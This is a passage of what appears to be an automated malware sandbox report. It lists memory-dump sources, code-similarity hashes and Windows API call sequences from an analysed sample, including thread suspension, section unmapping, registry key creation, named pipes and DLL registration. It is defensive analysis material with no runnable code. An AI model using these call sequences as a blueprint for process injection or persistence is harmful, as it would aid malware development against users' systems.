  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
